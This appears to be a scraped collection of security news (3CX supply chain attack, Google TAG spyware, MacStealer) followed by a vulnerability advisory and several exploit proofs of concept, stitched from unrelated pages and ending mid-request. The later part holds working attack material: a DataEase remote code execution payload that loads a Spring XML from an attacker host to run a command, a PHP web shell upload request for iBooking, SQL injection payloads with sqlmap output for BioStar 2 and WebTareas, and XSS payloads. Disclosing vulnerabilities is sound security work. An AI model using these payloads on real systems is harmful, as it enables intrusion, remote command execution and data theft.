By Deeba Ahmed
According to cybersecurity researchers, a nation-state actor, LABYRINTH CHOLLIMA, is suspected to be behind the multi-stage attack on 3CXDesktopApp.
This is a post from HackRead.com Read the original post: Popular PABX platform, 3CX Desktop App suffers supply chain attack

SentinelOne has dubbed the attack “Smooth Operator,” while CrowdStrike suspects the involvement of a North Korean government-state actor known as LABYRINTH CHOLLIMA.

CrowdStrike and SentinelOne cybersecurity researchers identified an unusual spike in malicious activity from a single, legitimate binary, 3CX Voice Over Internet Protocol (VOIP) desktop App (3CX Desktop App).

**Campaign Details**

On March 29, 2023, CrowdStrike researchers observed malicious activity, including beaconing to attacker-operated infrastructure, deploying second-stage payloads, and, in some cases, hands-on keyboard activity.

Since the app is available for Windows, macOS, and Linux, the activity was observed on Mac and Windows systems. Mobile versions are also available for Android and iOS devices. For browsers, the app is available as an extension for Chrome, and a browser-based version is available for the Progressive Web app.

Researchers suspect the involvement of a North Korean government-state actor, LABYRINTH CHOLLIMA. CrowdStrike Intelligence sent an alert to its customers yesterday morning. On the other hand, SentinelOne started seeing an uptick in 3CX Desktop App behaviour on March 22, 2023.

It is worth mentioning that SentinelOne has dubbed the attack “Smooth Operator.” The company urges customers to ensure that prevention policies are appropriately configured and that Suspicious Processes are activated to stay protected.

**Multi-Stage Attack Scenario**

In this multi-stage attack, the malicious 3CX Desktop App installer serves as a shellcode loader that executes the shellcode from heap space and loads a DLL after removing the “MZ” at the start.

This DLL is later called through the DllGetClassObject export. At this stage, icon files are downloaded from a specific GitHub repository: (github.com/IconStorages/images).

These ICO files append Base64 data at the end, which is then decoded and used to download the final stage. In this stage, info-stealer functionality is implemented, which includes collecting system and browser data. It can collect data from Chrome, Brave, Edge, and Firefox browsers, and the collected data includes browsing history from Chrome and Places tab data from Firefox.

**What is 3CXDesktopApp**

For your information, 3CX Desktop App is a widely-used voice and video conferencing and call routing software characterized as a Private Automatic Branch Exchange (PABX) platform.

The platform is used by 600,000 companies globally and has more than 12 million active users. Companies in the automobile, manufacturing, hospitality, food & beverage, and MSP (managed information technology provider) sectors commonly use it.

It is worth noting that PBX software is an attractive target for launching supply-chain attacks, as these allow attackers to monitor organizations’ communications and alter call routing and broker connections into external voice services.

**UPDATE:**

In a subsequent update, 3CX stated that the problem seemed to stem from a bundled library that was compiled into the Windows Electron app via git, and the company is currently conducting further investigations into the matter.

1.  PyPI Packages Drop Malware in New Supply Chain Attack
2.  News Corp’s software supply chain attack & cybersecurity
3.  SolarWinds supply chain attack affected 250 organizations
4.  Access:7 Supply Chain Flaws Impact ATMs and IoT devices

Popular PABX platform, 3CX Desktop App suffers supply chain attack

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.
"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls

Supply Chain / Software Security

3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers.

"The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said.

The cybersecurity firm is tracking the activity under the name **SmoothOperator**, stating the threat actor registered a massive attack infrastructure as far back as February 2022.

3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Express, BMW, Honda, Ikea, Pepsi, and Toyota, among others.

While the 3CX PBX client is available for multiple platforms, Sophos, citing telemetry data, pointed out that the attacks observed so far are confined to the Windows Electron client of the PBX phone system.

The infection chain, in a nutshell, takes advantage of the DLL side-loading technique to load a rogue DLL (ffmpeg.dll) that's designed to retrieve an icon file (ICO) payload. The GitHub repository hosting the file has since been taken down.

The information stealer is capable of gathering system information and sensitive data stored in Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox browsers.

Cybersecurity firm CrowdStrike said it suspects the attack to be linked to a North Korean nation-state actor it tracks as Labyrinth Chollima (aka Nickel Academy), a sub-cluster within the notorious Lazarus Group.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

"The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity," CrowdStrike added.

In a forum post, 3CX's CEO Nick Galea said it's in the process of issuing a new build over the next few hours, and noted that Android and iOS versions are not impacted. "Unfortunately this happened because of an upstream library we use became infected," Galea said, without specifying more details.

In the interim, the company is urging its customers to uninstall the app and install it again, or alternatively use the PWA client.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Desktop App Targeted in Supply Chain Cyber Attack, Affecting Millions of Users

By Habiba Rashid
Google's Threat Analysis Group (TAG) labeled the spyware campaign as limited but highly targeted.
This is a post from HackRead.com Read the original post: Google reveals spyware attack on Android, iOS, and Chrome

The primary target of this spyware campaign were the unsuspecting users in Italy, Malaysia, and Kazakhstan.

Google’s Threat Analysis Group (TAG) has discovered two highly-targeted mobile spyware campaigns that use zero-day exploits to deploy surveillance software against iPhone and Android smartphone users.

Google TAG discovered two “distinct, limited, and highly targeted” campaigns aimed at users of Android, iOS, and Chrome on mobile devices. The campaigns used zero-day and n-day exploits, taking advantage of the period between when vendors release vulnerability fixes and when hardware manufacturers update end-user devices with those patches, creating exploits for unpatched platforms.

These discoveries highlight the importance of timely software patching by vendors and end-users to prevent malicious actors from exploiting known vulnerabilities. The campaigns also suggest that surveillance software vendors share exploits and techniques to enable the proliferation of potentially dangerous hacking tools.

The first campaign (CVE-2022-42856; CVE-2022-4135) targeted versions of iOS and Android before 15.1 and ARM GPU running Chrome versions before 106, respectively. The payload of the exploit in the first campaign included a simple stager that pinged back the GPS location of the device and allowed the attacker to install an .IPA file onto the affected handset, which can be used to steal information.

The campaign targeted both Android and iOS devices, with initial access attempts delivered via Bit.ly URL shorter links sent over SMS to users located in the following three countries:

1.  Italy
2.  Malaysia
3.  Kazakhstan.

The second campaign (CVE-2022-4262; CVE-2023-0266), which included a complete exploit chain using both zero-days and n-days, targeted the latest version of the Samsung Internet browser.

The payload of the exploit in the second campaign was a C++-based, “fully-featured Android spyware suite” that included libraries for decrypting and capturing data from various chat and browser applications.

Google researchers suspect that the actor involved may be a customer, partner, or otherwise close affiliate of Variston, a commercial spyware vendor.

It is worth noting that as reported by Hackread.com last year, Variston is a Barcelona-based company that Google TAG exposed for exploiting n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender while posing as a custom cybersecurity solutions provider.

An example screenshot from one of the malicious websites targeting users in Italy (Credit: Google)

TAG actively tracks commercial spyware vendors, with more than 30 currently under observation, and identifies exploits or surveillance capabilities sold to state-sponsored actors. These dangerous hacking tools arm governments with surveillance capabilities they would not be able to develop in-house.

These tools, including spyware, are often used to target dissidents, journalists, human rights workers, and opposition-party politicians, posing life-threatening risks.

Although the use of surveillance technology is generally legal under most national or international laws, governments have abused these laws and technologies to target individuals who do not align with their agendas.

Regulators and vendors alike have been cracking down on the production and use of commercial spyware since the revelation of governments abusing NSO Group’s Pegasus mobile spyware to target iPhone users came under international scrutiny.

On March 28, the Biden administration issued an executive order that restricts the use of commercial surveillance tools by the federal government, but Google’s findings show that these efforts have not thwarted the commercial-spyware scene.

It is imperative that regulations governing the production and use of commercial spyware be strengthened to ensure that they are not used to target individuals in violation of their fundamental rights.

The discoveries demonstrate that those creating the exploits are keeping a close eye on vulnerabilities they can exploit for nefarious purposes and are likely colluding to maximize the potential for using them to compromise targeted devices.

1.  Google cracks down on sites with ties to hack-for-hire groups
2.  Israeli Spyware Vendor Use Chrome 0day to Target Journalists
3.  ISPs Helping Attackers Install Hermit Spyware on Smartphones
4.  Malware vendor returns with yet another nasty Android malware
5.  European Spyware Vendor Offer Android and iOS Device Exploits

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Google reveals spyware attack on Android, iOS, and Chrome

By Deeba Ahmed
The new MacStealer malware is being advertised on a notorious Russian hacker and cybercrime forum.
This is a post from HackRead.com Read the original post: Beware of MacStealer: A New Malware Targeting macOS Catalina Devices

MacStealer steals extensive data from a targeted device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

If your device runs on macOS Catalina, be cautious because a new malware has surfaced dubbed MacStealer, which mainly targets Catalina-running Mac devices and infects both Apple Silicon and Intel chips.

**MacStealer steals a wide range of user data**

Security researchers at Uptycs discovered MacStealer and observed that it steals extensive data from the device, including personal data, iCloud Keychain data, images, passwords, and credit card details.

Furthermore, the malware can steal browser cookies, documents, and login details from the targeted Mac. It works specifically on MacOS Catalina-based Macs. The malware steals cookies and credentials from Google Chrome, Firefox, and Brave browsers along with extracting the Keychain database.

Moreover, it can obtain several file types, such as text files, MP3s, photographs, PowerPoint files, and databases.

**How Does the Attack Take Place?**

The attack starts by taking the Keychain wholesale without accessing its data. The stolen database is transmitted to the attacker via Telegram in encrypted form. A separate ZIP folder is also shared with the attacker through a Telegram bot.

The malware developer, who is selling access to MacStealer for $100 per build, claims that the extracted Keychain cannot be accessed without the master password.

The developer has provided a list of upcoming features of MacStealer, which includes stealing funds from cryptocurrency wallets, a dedicated tool for creating new builds, a custom uploader, a reverse shell, and a control panel. The upcoming versions may also feature the capability to steal data from the Safari browser and Apple Notes.

This is what the MacStealer malware developer has to say on a Russian hacker forum (Image credit: Uptycs)

**How to Stay Safe?**

Researchers couldn’t identify how MacStealer moves between Macs. Initial infections were caused by the weed.dmg app, which bears the icon of a leaf and appears as an executable. When this file is opened, it displays a fake macOS password prompt.

(Image credit: Uptycs)

It is worth noting that this prompt isn’t the same as the genuine macOS password prompt. If the user enters credentials, the tool can access other documents on the device. Therefore, if you are an experienced Mac user, it would be easier to identify this difference.

Keep your Mac device updated and patched, and only download/install files from trusted sources, such as the App Store.

1.  5 macOS Monterey Issues You Need to Fix
2.  macOS Hit By New “Alchimist” Attack Framework
3.  macOS Users hit by Chinese Iron Tiger APT Group
4.  DazzleSpy infects macOS through hacked websites
5.  Multi-platform SysJoker backdoor hits macOS devices

Beware of MacStealer: A New Malware Targeting macOS Catalina Devices

DataEase is an open source data visualization analysis tool. In Dataease users are normally allowed to modify data and the data sources are expected to properly sanitize data. The AWS redshift data source does not provide data sanitization which may lead to remote code execution. This vulnerability has been fixed in v1.18.5. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Impact**

In Dataease, a normal user can handle the data source. the AWS datasource redshift in the data source function doesn't do properly security measures that will lead to remote code execution。

A normal user can input some properties that connected to the AWS Redshift。

The Redshift does not accept the EXTRA\_PARAMS like other database like pgsql or mysql. But that is not a problem to construct a remote code execution.

The database filed doesn't normalize , so just build a database name like that test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}

The complete configuration just like  
configuration = { "initialPoolSize":5,"schema":"jdbc",    "extraParams": "",                   "minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,                   "connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100",                   "dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg={}".format(payload),                   "username":"test","password":"test","port":"5432"}

And then will trigger the redshift execution remote code just like pgsql

from com.amazon.redshift.Driver#connect

then trigger at com.amazon.redshift.core.SocketFactoryFactory#getSocketFactory

POC

POST /datasource/validate/ HTTP/1.1 Host: 192.168.0.102 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN Accept-Encoding: gzip, deflate Content-Type: application/json Authorization: [A normal user token] LINK-PWD-TOKEN: null Content-Length: 889 Origin: http://192.168.0.102/ Connection: close Referer: http://192.168.0.102/

{"configuration":"eyJpbml0aWFsUG9vbFNpemUiOjUsInNjaGVtYSI6ImpkYmMiLCJleHRyYVBhcmFtcyI6IiIsIm1pblBvb2xTaXplIjo1LCJtYXhQb29sU2l6ZSI6NTAsIm1heElkbGVUaW1lIjozMCwiYWNxdWlyZUluY3JlbWVudCI6NSwiaWRsZUNvbm5lY3Rpb25UZXN0UGVyaW9kIjo1LCJjb25uZWN0VGltZW91dCI6NSwiY3VzdG9tRHJpdmVyIjoiZGVmYXVsdCIsInF1ZXJ5VGltZW91dCI6MzAsImhvc3QiOiIxOTIuMTY4LjAuMTAwIiwiZGF0YUJhc2UiOiJ0ZXN0P3NvY2tldEZhY3Rvcnk9b3JnLnNwcmluZ2ZyYW1ld29yay5jb250ZXh0LnN1cHBvcnQuQ2xhc3NQYXRoWG1sQXBwbGljYXRpb25Db250ZXh0JnNvY2tldEZhY3RvcnlBcmc9aHR0cDovLzE5Mi4xNjguMC4xMDA6NDgwODAvY2FsY3VsYXRvcjIueG1sIiwidXNlcm5hbWUiOiJ0ZXN0IiwicGFzc3dvcmQiOiJ0ZXN0IiwicG9ydCI6IjU0MzIifQ==","apiConfiguration":[],"type":"redshift","name":"test","configurationEncryption":true}

The configuration base64 decode is

{"initialPoolSize":5,"schema":"jdbc","extraParams":"","minPoolSize":5,"maxPoolSize":50,"maxIdleTime":30,"acquireIncrement":5,"idleConnectionTestPeriod":5,"connectTimeout":5,"customDriver":"default","queryTimeout":30,"host":"192.168.0.100","dataBase":"test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://192.168.0.100:48080/calculator2.xml","username":"test","password":"test","port":"5432"}

And make a http server at 192.168.0.100:48080 serve a file calculator2.xml

<beans xmlns="http://www.springframework.org/schema/beans"        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"        xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd ">     <bean id="pb" class="javax.script.ScriptEngineManager" >         <property name="message" value="#{ pb.getEngineByName('nashorn').eval('java.lang.Runtime.getRuntime().exec(''touch /tmp/redshift2'')') }" />     </bean> </beans>

Affected versions: <= 1.18.4

**Patches**

The vulnerability has been fixed in v1.18.5.

**Workarounds**

It is recommended to upgrade the version to v1.18.5.

**References**

If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease  
Email us at wei@fit2cloud.com

CVE-2023-28637: DataEase AWS redshift data source exists for remote code execution vulnerability

iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

Suprema BioStar 2 version 2.8.16 suffers from a remote SQL injection vulnerability.

    # Exploit Title: CVE-2023-27167 - Suprema BioStar 2 v2.8.16 - SQL Injection# Date: 26/03/2023# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)# Vendor Homepage: https://www.supremainc.com/# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide# Version: 2.8.16# Tested on: Windows, Linux## Description A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter. ## Request PoC #1'''POST /api/users/absence?search_month=1 HTTP/1.1Host: biostar2.server.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: application/json, text/plain, */*Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflatecontent-type: application/json;charset=UTF-8content-language: enbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548Content-Length: 204Origin: https://biostar2.server.netConnection: closeReferer: https://biostar2.server.net/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}'''Time based SQL injection (set 4 – response delays for 8 seconds).'''## Request PoC #2'''POST /api/users/absence?search_month=1 HTTP/1.1Host: biostar2.server.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: application/json, text/plain, */*Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflatecontent-type: application/json;charset=UTF-8content-language: enbs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548Content-Length: 188Origin: https://biostar2.server.netConnection: closeReferer: https://biostar2.server.net/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}'''Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)'''## Exploit with SQLmapSave the request from Burp Suite to file.'''---Parameter: JSON #1* ((custom) POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}---[05:02:49] [INFO] testing MySQL[05:02:49] [INFO] confirming MySQL[05:02:50] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL > 5.0.0 (MariaDB fork)[05:02:50] [INFO] fetching database names[05:02:50] [INFO] fetching number of databases[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[05:02:55] [INFO] retrieved: 2[05:03:12] [INFO] retrieved: biostar2_ac[05:03:56] [INFO] retrieved: information_schemaavailable databases [2]:[*] biostar2_ac[*] information schema'''

Suprema BioStar 2 2.8.16 SQL Injection

WebTareas version 2.4 suffers from a remote blind SQL injection vulnerability. Original discovery of this issue in this version is attributed to Behrad Taher in May of 2022. Related CVE number: CVE-2021-43481.

    # Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example -----------------------------------------------------------------------------------------------------------------------Param: webTareasSID in cookie-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:50 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:39 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 355Connection: closeContent-Type: text/html; charset=UTF-8You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /><b>Warning</b>:  Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />-----------------------------------------------------------------------------------------------------------------------SQLMap:-----------------------------------------------------------------------------------------------------------------------sqlmap resumed the following injection point(s) from stored session:---Parameter: Cookie #1* ((custom) HEADER)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    [11:49:03] [INFO] testing MySQL  [11:49:03] [INFO] confirming MySQL  do you want to URL encode cookie values (implementation specific)? [Y/n] Y  [11:49:03] [INFO] the back-end DBMS is MySQL  web application technology: PHP 7.4.30, Apache 2.4.54  back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  [11:49:03] [INFO] fetching database names  [11:49:04] [INFO] starting 6 threads  [11:49:06] [INFO] retrieved: 'zxcv'  [11:49:06] [INFO] retrieved: 'information_schema'  [11:49:06] [INFO] retrieved: 'performance_schema'  [11:49:06] [INFO] retrieved: 'test'  [11:49:06] [INFO] retrieved: 'phpmyadmin'  [11:49:06] [INFO] retrieved: 'mysql'  available databases [6]:  [*] information_schema  [*] mysql  [*] performance_schema  [*] phpmyadmin  [*] test  [*] zxcv  [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'  [11:49:06] [WARNING] your sqlmap version is outdated  [*] ending @ 11:49:06 /2022-10-15/

WebTareas 2.4 SQL Injection

WebTareas version 2.4 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Proof Of Concept -----------------------------------------------------------------------------------------------------------------------Param: searchtype-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateOrigin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/general/search.php?searchtype=simpleCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 07:46:31 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11147[...]<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">[...]-----------------------------------------------------------------------------------------------------------------------Other vulnerable url and params:-----------------------------------------------------------------------------------------------------------------------/webtareas/administration/print_layout.php [doc_type]/webtareas/general/login.php [logout]/webtareas/general/login.php [session]/webtareas/general/newnotifications.php [msg]/webtareas/general/search.php [searchtype]/webtareas/administration/print_layout.php [doc_type]

WebTareas 2.4 Cross Site Scripting

WebTareas version 2.4 suffers from a remote shell upload vulnerability.

    # Exploit Title: WebTareas 2.4 - RCE (Authorized)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example in forum -> members forum -> chat-----------------------------------------------------------------------------------------------------------------------Param: chatPhotos0-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /webtareas/includes/chattab_serv.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126Content-Length: 6852Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; 